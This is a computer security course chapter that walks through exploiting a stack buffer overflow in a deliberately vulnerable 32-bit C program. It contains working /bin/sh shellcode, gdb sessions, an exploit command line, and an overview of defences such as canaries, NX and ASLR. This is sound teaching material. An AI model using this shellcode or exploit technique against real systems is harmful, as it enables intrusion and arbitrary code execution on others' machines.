Buffer Overflow

A buffer overflow example

In this chapter we will learn in detail what a buffer overflow is, and how to exploit it on x86-32 system architectures. The right approach to study this chapter is to reproduce each step on your own machine. You should be able to eventually achieve exploiting a buffer overflow on your own machine; details of addresses value would be different, but the logic is the same.

Let’s start with the following program:

#include <stdio.h>
#include <stdlib.h>

char *
gets(char *buf) {
  int c;
  while((c = getchar()) != EOF && c != '\n')
    *buf++ = c;
  *buf = '\0';
  return buf;
}

int
read_req(void) {
  char buf[10];
  int i;
  gets(buf);
  i = atoi(buf);
  return i;
}

int
main() {
  int x = read_req();
  printf("x = %d\n", x);
}

One can compile it as follows:

$ gcc -g -m32 -fno-stack-protector unsafe_ex1.c -o unsafe_ex1

This code contains an exploitable buffer overflow. This chapter’s goal is to learn how exploitation may arise from such a vulnerability, and what defense may be used.

Understanding how to exploit a buffer overflow may be tricky the first time. It involves low-level assembly, debuggers, a pinch of logic, and some curiosity. We’ll do this step by step.

If one looks into the code, one may conclude that buf’s memory lies on the function’s stack frame; we just don’t know where on the stack frame. Theoretically the compiler could decide to put the beginning of the buffer close to the value %ebp in pointing to, and let the buffer fills towards lower addresses. It could also put the beginning of the buffer at lower address, and grows towards higher address.

Since we don’t know, let’s check what the compiler is doing!

$ gdb unsafe_ex1
break read_req ; put a breakpoint of read_reaq call.
r ; run the code

Start by using the gdb debugger to load the program. Break over the read_req symbol (that’s why compiling should have -g option to generate these symbols into the binary).

Do the following:

Breakpoint 1, read_req () at unsafe_ex1.c:17
17	  gets(buf);

(gdb) print &buf
$2 = (char (*)[10]) 0xffffd0b2

(gdb) info reg
eax            0x5655623c          1448436284
ecx            0xffffd100          -12032
edx            0xffffd120          -12000
ebx            0x56558fd0          1448447952
esp            0xffffd0b0          0xffffd0b0
ebp            0xffffd0c8          0xffffd0c8
...

This allows to understand a bit how the function stack’s frame looks like in memory. We have information about the main registers, and we know where buf is located, just above %esp:

                         +------------------+
                         |  main()'s frame  |
                         |                  |
                         |                  |
  read_req() frame ----> +------------------+
                         |  return address  | 4 bytes
            %ebp ------> +------------------+
                         |    saved %ebp    | 4 bytes
                         +------------------+
                         |        i         | 4 bytes
                         +------------------+
                         |       ...        |
                         +------------------+
                         |     buf[10]      |
                         |       ...        |
                         |      buf[0]      | 1 byte
                         |                  | 1 byte
                         |                  | 1 byte
            %esp ------> +------------------+

The x86 stack grows down in addresses but the buffer grows up in address, so it looks reversed on the stack frame.

We can also observe that the stack frame is aligned on a 4-byte boundary. %ebp is pointing to 0xffffd0c8. %esp is at 0xffffd0b0. There are 24 bytes in between, and 4 more bytes above %ebp, totalling to 28 bytes. Aligning 4-bytes data to 4-bytes boundary avoids data to spill over 2 cache entries.

So, the buffer grows towards the beginning of the stack frame. We may also look into the values saved on the stack below %ebp:

(gdb) x/xw $ebp
0xffffd0c8:	0xffffd0e8

We read one word (x/xw), so 32-bits, below %ebp. The value is 0xffffd0e8, which is the %ebp value of main()’s frame.

What about the return address? Let’s take an offset of $ebp, towards higher address as the stack drawing displays:

(gdb) x/xw $ebp+4
0xffffd0cc:	0x5655625e

So, at address 0xffffd0cc, we find the value 0x5655625e. This value is expected to be the address of the instruction to execute right after returning from the function. Let’s disassemble main’s stack frame to check for that:

(gdb) disas main
Dump of assembler code for function main:
   0x5655623c <+0>:	lea    0x4(%esp),%ecx
   0x56556240 <+4>:	and    $0xfffffff0,%esp
   0x56556243 <+7>:	push   -0x4(%ecx)
   0x56556246 <+10>:	push   %ebp
   0x56556247 <+11>:	mov    %esp,%ebp
   0x56556249 <+13>:	push   %ebx
   0x5655624a <+14>:	push   %ecx
   0x5655624b <+15>:	sub    $0x10,%esp
   0x5655624e <+18>:	call   0x565560c0 <__x86.get_pc_thunk.bx>
   0x56556253 <+23>:	add    $0x2d7d,%ebx
   0x56556259 <+29>:	call   0x56556201 <read_req>
   0x5655625e <+34>:	mov    %eax,-0xc(%ebp)
   0x56556261 <+37>:	sub    $0x8,%esp
   0x56556264 <+40>:	push   -0xc(%ebp)
   0x56556267 <+43>:	lea    -0x1fc8(%ebx),%eax
   0x5655626d <+49>:	push   %eax
   0x5655626e <+50>:	call   0x56556050 <printf@plt>
   0x56556273 <+55>:	add    $0x10,%esp
   0x56556276 <+58>:	mov    $0x0,%eax
   0x5655627b <+63>:	lea    -0x8(%ebp),%esp
   0x5655627e <+66>:	pop    %ecx
   0x5655627f <+67>:	pop    %ebx
   0x56556280 <+68>:	pop    %ebp
   0x56556281 <+69>:	lea    -0x4(%ecx),%esp
   0x56556284 <+72>:	ret    
End of assembler dump.

On the left, we have the address where main’s code is stored. Indeed, the instruction next to the call of read_req is at 0x5655625e.

Tip

If we can control the return address, we can manipulate execution! But can we?

$ Breakpoint 1, read_req () at unsafe_ex1.c:17
$ 17	  gets(buf);
$ (gdb) cont
$ Continuing.
$ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
$ Program received signal SIGSEGV, Segmentation fault.
$ 0x41414141 in ?? ()

0x41 is the ascii value of ‘A’ (4*16 + 1 in base 10; as one may observe within an ASCII table). So it looks like the program crashed because it tried to jump to 0xAAAA = 0x41414141

Tip

How many A’s should we input to override the return address but nothing over it?

We can compute directly from looking at the stack drawing, or from gdb:

(gdb) print $ebp+4 - $esp+2
$1 = 30

So we need to input 30 A’s.

(gdb) r
Breakpoint 1, read_req () at unsafe_ex1.c:17
17	  gets(buf);
(gdb) next
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
(gdb) x/xw $ebp+4
0xffffd0cc:	0x41414141

Success, we can control the return address, so we can indirectly control the $eip register since the RET instruction at the end of the function updates $eip with what is stored at address 0xffffd0cc.

You may try to use stepi or next in gdb until the RET instruction executes. stepi would execute instruction-per-instruction. Once RET executes, one can observe the %eip value, doing:

(gdb) info reg
eax            0x0                 0
ecx            0x0                 0
edx            0xa                 10
ebx            0x41414141          1094795585
esp            0xffffd0d0          0xffffd0d0
ebp            0x41414141          0x41414141
esi            0xffffd1b4          -11852
edi            0xf7ffcb80          -134231168
eip            0x41414141          0x41414141

It contains value 0x41414141; so we’re indeed able to control its content using a buffer overflow. We know how to jump ‘somewhere’. Our goal is to execute arbitrary code; we still have some missing piece.

Tip

Idea! We could fill the buffer with code instead of ‘A’ and override the return address with the address of the buffer holding the code.

Code is nothing else than data; and we have some space we control (the buffer) to put data. We put many ’A’s, but we could fill it with something useful instead, like x86-32 instructions and execute them thanks to our control over $eip.

Controlling `%eip`

So, the plan is as follows:

Write x86-32 instructions in buf, on the stack.
Learn what is the address value &buf.
Overflow buf and re-write the return address with the address &buf.

                         +------------------+
                         |  main()'s frame  |
                         |                  |
                         |                  |
  read_req() frame ----> +------------------+
                         |       &buf       | We put address of buf here!
            %ebp ------> +------------------+
                         |    saved %ebp    | 4 bytes
                         +------------------+
                         |        i         | 4 bytes
                         +------------------+
                         |       ...        |
                         +------------------+
                         |     buf[10]      | ...
                         |       ...        | 2nd byte of malicious code
                         |      buf[0]      | 1st byte of malicious code
                         |                  | 1 byte
                         |                  | 1 byte
            %esp ------> +------------------+

So we can fill the buffer with any instruction we want. The classic example is making the program spawn a shell. A shell is a command-line interpreter on Unix-based system, which comes installed by default on any Unix, located in /bin/sh. It is useful to launch other programs.

In summary, we want to exploit a program X with a buffer overflow vulnerability, and insert a program Y within X that potentially allows us to execute any program Zonce Y gets executed by X’s manipulated return address.

Reverse engineering of execve

Let’s focus on Y, i.e., we can write a program Y that executes programs using the syscall execve(), and it is rather simple:

int main()
{
        char *shell[2];

        shell[0] = "/bin/sh";
        shell[1] = NULL;

        execve(shell[0], shell, NULL);
}

Compiling and executing gives a shell:

$ gcc -m32 shell.c -o shell

$ ./shell
$

The program is indeed swapped to another (a shell), as execve()’s documentation into the Linux’s programmer manual says (man 2 execve).

So ideally, we want to inject something similar to program X, but we cannot inject this shell program as is. Why?

What we execute (shell) is not only code, it is a ELF binary. We only want the x86-32 instructions. Necessary information like “/bin/sh” is stored inside the .rodata segment of program shell, and the vulnerable program that we wish to attack likely does not have “/bin/sh” into its .rodata, so the code within shell is not portable to the targeted binary. Even if we could execute shell’s code in the context of the victim program, it would not work.

However, we can study shell’s code instructions to design portable instructions to call execve(). That’s a small step into reverse engineering, so bear with me, it’s getting slightly more complex here.

Let’s run shell within a debugger:

$ gdb shell
Reading symbols from shell...
$ (gdb) break execve
Breakpoint 1 at 0x1060
$ (gdb) run 
Breakpoint 1, 0xf7e51870 in execve () from /lib/i386-linux-gnu/libc.so.6
$ (gdb) disas execve
Dump of assembler code for function execve:
=> 0xf7e51870 <+0>:	endbr32 
   0xf7e51874 <+4>:	push   %ebx
   0xf7e51875 <+5>:	mov    0x10(%esp),%edx
   0xf7e51879 <+9>:	mov    0xc(%esp),%ecx
   0xf7e5187d <+13>:	mov    0x8(%esp),%ebx
   0xf7e51881 <+17>:	mov    $0xb,%eax
   0xf7e51886 <+22>:	call   *%gs:0x10
   0xf7e5188d <+29>:	pop    %ebx
   0xf7e5188e <+30>:	cmp    $0xfffff001,%eax
   0xf7e51893 <+35>:	jae    0xf7d946d0
   0xf7e51899 <+41>:	ret 
$ (gdb) stepi ; let's move forward by two instructions to inspect our registers
$ (gdb) stepi
(gdb) disas execve
Dump of assembler code for function execve:
   0xf7e51870 <+0>:	endbr32 
   0xf7e51874 <+4>:	push   %ebx
=> 0xf7e51875 <+5>:	mov    0x10(%esp),%edx
   0xf7e51879 <+9>:	mov    0xc(%esp),%ecx
   0xf7e5187d <+13>:	mov    0x8(%esp),%ebx
   0xf7e51881 <+17>:	mov    $0xb,%eax
   0xf7e51886 <+22>:	call   *%gs:0x10
   0xf7e5188d <+29>:	pop    %ebx
   0xf7e5188e <+30>:	cmp    $0xfffff001,%eax
   0xf7e51893 <+35>:	jae    0xf7d946d0
   0xf7e51899 <+41>:	ret

Looking at the instructions within execve, we’re putting something into edx located at 0x10 above %esp.

Warning

execve’s code is not compiled by us; it is part of the standard library compiled by the linux image’s developers. It is compiled with optimizations enabled, so its code may look strange.

We know thanks to the cdecl convention that main’s code pushed the arguments of execve to the stack in reverse orders.

=> 0xf7e51875 <+5>: mov    0x10(%esp),%edx

$ (gdb) x/wx $esp+0x10 ; let's dereference $esp+0x10 (careful, it means $esp+16 in base10)
0xffffd0b8:	0x00000000

That is, %edx gets the NULL value. (0x00000000) as per needed by execve’s parameters.

Next we have:

 0xf7e51879 <+9>: mov    0xc(%esp),%ecx

$ (gdb) x/xw $esp+0xc
0xffffd0b4:	0xffffd0c4

0xffffd0c4 points to the char *shell[2] array, which is an array of two pointers towards chars. Finally,

0xf7e5187d <+13>:  mov    0x8(%esp),%ebx

put the pointer to “/bin/sh” into $ebx.

$ (gdb) x/xw $esp+0x8
0xffffd0b0:	0x56557008

0x565557008 is the address of “/bin/sh” contained in the segment .rodata. You may verify this by reading the segment:

$ readelf -x .rodata shell

Vidange hexadécimale de la section « .rodata » :
  0x00002000 03000000 01000200 2f62696e 2f736800 ......../bin/sh.

Eventually, the following instruction

0xf7e51881 <+17>:  mov    $0xb,%eax

copies the syscall execve()’s id (0xb) to %eax, and call it on the next instruction.

`Shellcode`: building the exploit

So that we know how execve() works, we can try to write the necessary information it needs with the code we send. The ‘malicious’ code would then have two objectives:

Prepare the preamble of execve()
call excecve() to get a shell

This is called a shellcode. Most of the difficulty is in 1). We have to prepare and put on the victim’s stack the needed arguments ourself and load %ecx, %ebx and %edx with the appropriate value before calling execve():

xorl  %eax, %eax ; create a NULL value and put it in %eax
push  %eax ; push NULL on the stack
push  $0x68732f2f ; Observe this is /sh reversed with an extra '/' (hs//)
push  $0x6e69622f ; Observe this is the bytes /bin reversed (nib/)
mov   %esp, $ebx ; $ebx now points to /bin//sh
push  %eax ; other NULL parameter needed to execve()
push  %ebx ; save pointer to /bin//sh\0 on the stack (execve()'s argument)
mov   %esp, %ecx ; %ecx points to (/bin/ssh)\0 (the shell array)
mov   %eax, %edx ; 0x00000000 in %edx
movb  $0x0b, %al  ; %al is the lower 8 bits of %ecx
call  *gs:0x10    ;

We can test is using a small C program and the instructions transformed to opcodes (i.e., the hexadecimal representation of each instruction).

void foo(int ptr) {
  int *ret;

  ret = (int *)&ret + 2; // Pointer arithmetic assumes the size of the pointee
                         // So here +2 means + 2*sizeof(int) = 8.
                         // i.e., location of &ret + 8 bytes assuming
                         // compiled with -fno-stack-protector
  *ret = ptr;
}

int main()
{
  char sc[]=               /* 29 bytes                       */
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\x68""//sh"           /* pushl   $0x68732f2f            */
    "\x68""/bin"           /* pushl   $0x6e69622f            */
    "\x89\xe3"             /* movl    %esp,%ebx              */
    "\x50"                 /* pushl   %eax                   */
    "\x53"                 /* pushl   %ebx                   */
    "\x89\xe1"             /* movl    %esp,%ecx              */
    "\x99"                 /* cdql                           */
    "\xb0\x0b"             /* movb    $0x0b,%al              */
    "\xcd\x80"             /* int     $0x80                  */
    ;
    /*"\x65\xff\x15\x10\x00\x00\x00" [> call *%gs:0x10         <]*/
  foo((int)sc);
  return 0;
}

Compiling:

gcc -m32 -z execstack -fno-stack-protector shellcode.c -o shellcode

$ ./shellcode
$

It works! The program spawned another program (our new shell) through execve(). We could test it over our vulnerable program. To simplify our little example, we modify the vulnerable program to read data from the program’s input rather than through reading stdin.

#include <stdio.h>
#include <stdlib.h>

static const int MAX_SIZE = 255;
char *
gets(char *buf, char *input) {
  int c;
  int i = 0;
  while((c = input[i]) != '\0' && i < MAX_SIZE) {
    i++;
    *buf++ = c;
  }
  *buf = '\0';
  return buf;
}

int
read_req(char *input) {
  char buf[24];
  int i;
  gets(buf, input);
  i = atoi(buf);
  return i;
}

int
main(int arcgc, char **argv) {
  int x = read_req(argv[1]);
  printf("x = %d\n", x);
}

We also increased the buffer size; it needs being able to hold the whole exploit (24 bytes of instructions). Also, the gets() function now does check for EOF; this symbol has value \xff on some system, which happens to be part of the address we want to jump to. The original code would not override the return address with \xff because of that.

Compile it:

gcc -g -m32 -z execstack -fno-stack-protector unsafe_ex2.c -o unsafe

Tip

All vulnerabilities are not necessary exploitable! If the buffer cannot hold all the necessary code to spawn our shell, it can’t be used this way (although, other tricks that we won’t cover exist, but the argument stands nonetheless).

To exploit the vulnerability, we can do the following:

setarch -R ./unsafe $(printf '<shellcode><padding><buf addr>')

setarch -R deactivates a defense existing on modern OSes to simplify exploitation.

<shellcode> = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"

<padding> = X bytes NOPs = “\x90” as our padding. 0x90 is the x86-32 instruction for ‘no instruction’ called NOP. You can put anything as padding, usually you’ll find examples using ‘A’ used after the shellcode. But if you want padding before the shellcode, that works too, NOP must be used.

<buf addr> = 4 bytes to override the return address with the address of the buffer.

So, two values have to be guessed. The number of bytes to pad up to the return address can be obtained from reading the code and guessing how much many bytes the compiler will allocate to the stack, knowing the stack’s frame.

The main problem is the address of the buffer on the stack. In a real exploitation scenario, it is not trivial to guess. We usually need an information leakage primitive (another kind of exploit) to get the address of the stack within some part of the program.

For this exercise, you can get it from gdb, or from printing it in the program, e.g., writing in the function read_req():

printf("the address of buf is %p\n", buf);

Be careful that printf allocates elements on the stack as well, so it may change the distance between %esp and %ebp.

Eventually, we have to find the right length of the shellcode to override the return address, and the right value of the return address. One way to help iterate towards the solution is to write your shellcode within a file using printf:

printf "<shellcode><padding><addr>" > shellcode.bin

That way, the binary values of the shellcode is stored. Then launch gdb, execute the vulnerable program with as argument, the binary output of you file:

setarch -R gdb unsafe

$ (gdb) run $(cat shellcode.bin)

and use break point for anything unclear. It is likely that you get wrong the size of the padding or the address at the first try. The debugger would help you inspect the memory to get all of this right. This may feel difficult for some, but such practice is useful in many other scenarios, and hopefully help understanding what’s going on :-)

Pay attention to the <buf addr> (e.g., 0xffffd0d8). You’ll need to write it in reverse. This is due to the endianness of x86 machines. Most systems are little-endian today, meaning that the least-significant byte is stored at the smallest address. Since the buffer is growing up, as do the addresses in x86, we need to store a 32-bits on the stack such that the least-significant byte is at the lowest address value.

Defending Buffer Overflow exploits

“The dev must learn to code better?” Nope. Culpability is not helpful.
We could save the return address of a function within another location, and compare to it before returning?
In the early 2000’s, the StackShield dev tool was modifying the compiled code to copy the RET address into the beginning of the .data segment during function prologue. The function epilogue would check whether the function’s RET value would differ from the value in the .data segment. If the values were different, the program would terminate.

StackGuard is a similar idea than StackShield – A random value would be chosen by the program at the beginning of its execution, and pushed to the stack during a function’s prologue, on top of the return address. The random value would also be stored in a safe location, called a canary. During the function epilogue, the program would check whether the stack guard matches the canary, and terminate the program if it does not.
Hardware defense + OS support:
Modern CPUs with 64-bits support usually have a feature called the NX bit (No-eXecute bit) within memory address. I.e., one bit of the pointer would tell the CPU control unit whether it can execute or not the instruction located at the given address. OSes like Windows, Linux, MAC OS, etc. use this feature to mark certain randomize the memory layout such that each execution of the program uses different part of the memory. Guessing the buffer’s address becomes significantly harder.
Program Static/Dynamic Analyzer
Tools aiming to warn the developers during compilation, or while running tests that unsafe operations are performed.
Safe programming language
Languages like Python or Java provide memory bound checking at runtime which automatically detect and prevent the execution of unsafe memory operations. The program however halts.
Better languages like Rust can offer to developers the same performance than C but with memory safety guarantees.

Keyboard shortcuts

INFOB301: Computer Security